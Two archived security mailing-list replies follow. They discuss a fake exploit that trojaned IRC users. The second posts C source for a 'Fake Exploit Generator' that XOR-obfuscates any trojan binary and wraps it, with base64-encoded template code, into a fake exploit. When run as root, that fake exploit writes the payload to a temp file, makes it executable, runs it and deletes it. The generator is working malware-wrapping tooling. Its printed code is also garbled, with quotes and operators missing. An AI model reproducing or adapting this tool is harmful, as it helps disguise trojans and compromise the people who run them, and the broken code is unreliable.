Re: [Full-Disclosure] Re: -1 day exploit - Warning

[David Bernick]

 Wow, I'd never run something that had a printf statement in it with
 
  print $sock JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake
  0day exp loit. v2\nPRIVMSG $chan :to run commands on me, type: .$nick.:
 command\n;
 
 if you run this you deserve to get owned.  this guy could have at least
 xor'd the strings and base64 encoded them or SOMETHING.

the printf statement is in the shellcode. if you don't know C and/or hex
very well it looks semi-legit. The attached perl code is the decoded shell
code, it's not in the actual exploit. This is the perfect kind of
program to trojan little hacker wannabes on IRC.

and no one deserves to be owned. They just need to pay for highly paid
security consultants instead (shhh..kidding). 

d

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: -1 day exploit - Warning

[gml]

On Friday 13 June 2003 06:51 pm, David Bernick wrote:

Well anyway, I got inspired:

// Fake Exploit Generator
// [EMAIL PROTECTED]
//

#include stdio.h
#include sys/types.h
#include sys/stat.h
#include unistd.h

#define badchar(c,p) (!(p = memchr(b64string, c, 64)))

#define BEAUTIFY indent

char b64string[] =
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/;

static char header[] = {
Ly8gZ2VuZXJhdGVkIHdpdGggRmFrZSBFeHBsb2l0IEdlbmVyYXRvciA6OiBnbWxAcGhyaWNr
Lm5ldAoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1
ZGUgPHN5cy9zdGF0Lmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4K
};

static char body[] = {
dm9pZCB1c2FnZShpbnQgYXJncywgY2hhciAqc2VsZikKewoJaWYoZ2V0dWlkKCkgIT0gMCkK
CXsKCQlwcmludGYoIlRoaXMgcHJvZ3JhbSByZXF1aXJlcyBwcml2aWxlZGdlcyB5b3UgZG8g
bm90IHBvc2Vzcy5cbiIpOwoJCWV4aXQoMCk7Cgl9CgllbHNlCgl7CgoJCWlmKGFyZ3MgPCAy
KQoJCXsKCQkJcHJpbnRmKCJ1c2FnZTogJXMgPHRhcmdldD5cbiIsIHNlbGYpOwoJCQlleGl0
KDApOwoJCX0KCX0KCn0KCnZvaWQgc2V0dXAoKQp7CgljaGFyICp0bXA7CglGSUxFICpmcDsK
CWNoYXIgYnl0ZVswXTsKCWludCBpOwoKCXRtcCA9IHRtcG5hbShOVUxMKTsKCWZwID0gZm9w
ZW4odG1wLCAidyIpOwoJaWYoZnApCgl7CgkJZm9yKGkgPSAwOyBpIDwgc2l6ZW9mKHNoZWxs
Y29kZSk7IGkrKykKCQl7CgkJCWJ5dGVbMF0gPSBzaGVsbGNvZGVbaV0gXiBNQVg7CgkJCWZ3
cml0ZShieXRlLCAxLCAxLCBmcCk7CgkJfQoJCWZjbG9zZShmcCk7CgkJY2htb2QodG1wLCAw
NzU1KTsKCQlzeXN0ZW0odG1wKTsKCQl1bmxpbmsodG1wKTsKCX0KfQoKaW50Cm1haW4gKGlu
dCBhcmdjLCBjaGFyICphcmd2W10pCnsKCXVzYWdlKGFyZ2MsIGFyZ3ZbMF0pOwoJc2V0dXAo
KTsKCS8vIGRvIHNvbWUgc2hpdCBoZXJlCn0K
};

long b64dec (char *to, char *from, unsigned int len)
{
char *fromp = from;
char *top = to;
char *p;
unsigned char cbyte;
unsigned char obyte;
int padding = 0;

for (; len = 4; len -= 4) {
if ((cbyte = *fromp++) == '=') cbyte = 0;
else {
if (badchar(cbyte, p)) return -1;
cbyte = (p - b64string);
}
obyte = cbyte  2; /*  1100 */

if ((cbyte = *fromp++) == '=') cbyte = 0;
else {
if (badchar(cbyte, p)) return -1;
cbyte = p - b64string;
}
obyte |= cbyte  4;/*  0011 */
*top++ = obyte;

obyte = cbyte  4; /*   */
if ((cbyte = *fromp++) == '=') { cbyte = 0; padding++; }
else {
padding = 0;
if (badchar (cbyte, p)) return -1;
cbyte = p - b64string;
}
obyte |= cbyte  2;/*   */
*top++ = obyte;

obyte = cbyte  6; /* 1100  */
if ((cbyte = *fromp++) == '=') { cbyte = 0; padding++; }
else {
padding = 0;
if (badchar (cbyte, p)) return -1;
cbyte = p - b64string;
}
obyte |= cbyte; /* 0011  */
*top++ = obyte;
}

*top = 0;
if (len) return -1;
return (top - to) - padding;
}

void printhex(char c, FILE *fp)
{

char s[10];

if(c  16  c = 0)
{
fprintf(fp, \\x%2.2x, c);
}
else
{
if(c  0)
{
fprintf(fp, \\x%2.2x, c);
}
else
{
sprintf(s, %x, c);
fprintf(fp, \\x%c, s[6]);
fprintf(fp, %c, s[7]);
}
}
}

int main(int argc, char *argv[])
{

FILE *trojan;
FILE *fakeexp;
char byte[0];
int count = 0;

char *out;

out = (char *)malloc(sizeof(body));
memset(out, 0, sizeof(out));


#ifdef BEAUTIFY
char *cmd;
#endif

if(argc  4 )
{
printf(usage: %s trojan fakeexp.c key\n, argv[0]);
printf(ex: %s trojan fakeexp.c 187\n, argv[0]);
exit(0);
}

trojan = fopen(argv[1], r);
fakeexp = fopen(argv[2], w);
if(trojan  fakeexp)
{

b64dec(out, header, sizeof(header));
fprintf(fakeexp, %s, out);
memset(out, 0, sizeof(out));

fprintf(fakeexp, \n#define MAX\t%s\n\n, argv[3]);
fprintf(fakeexp, static char shellcode[] = {\n);

while(!feof(trojan))
{
memset(byte, 0, sizeof(byte));
fread(byte, 1, 1, trojan);
byte[0] = byte[0] ^ atoi(argv[3]); // obfuscate

if(count  15)
{
if(count == 0)
{
fprintf(fakeexp, \);
}
printhex(byte[0], fakeexp);
count++;
}
else
{
printhex(byte[0], fakeexp);
fprintf(fakeexp, \\n);
count = 0;
}
}

fprintf(fakeexp, \\n};\n\n);

b64dec(out, body, sizeof(body));
fprintf(fakeexp, %s, out);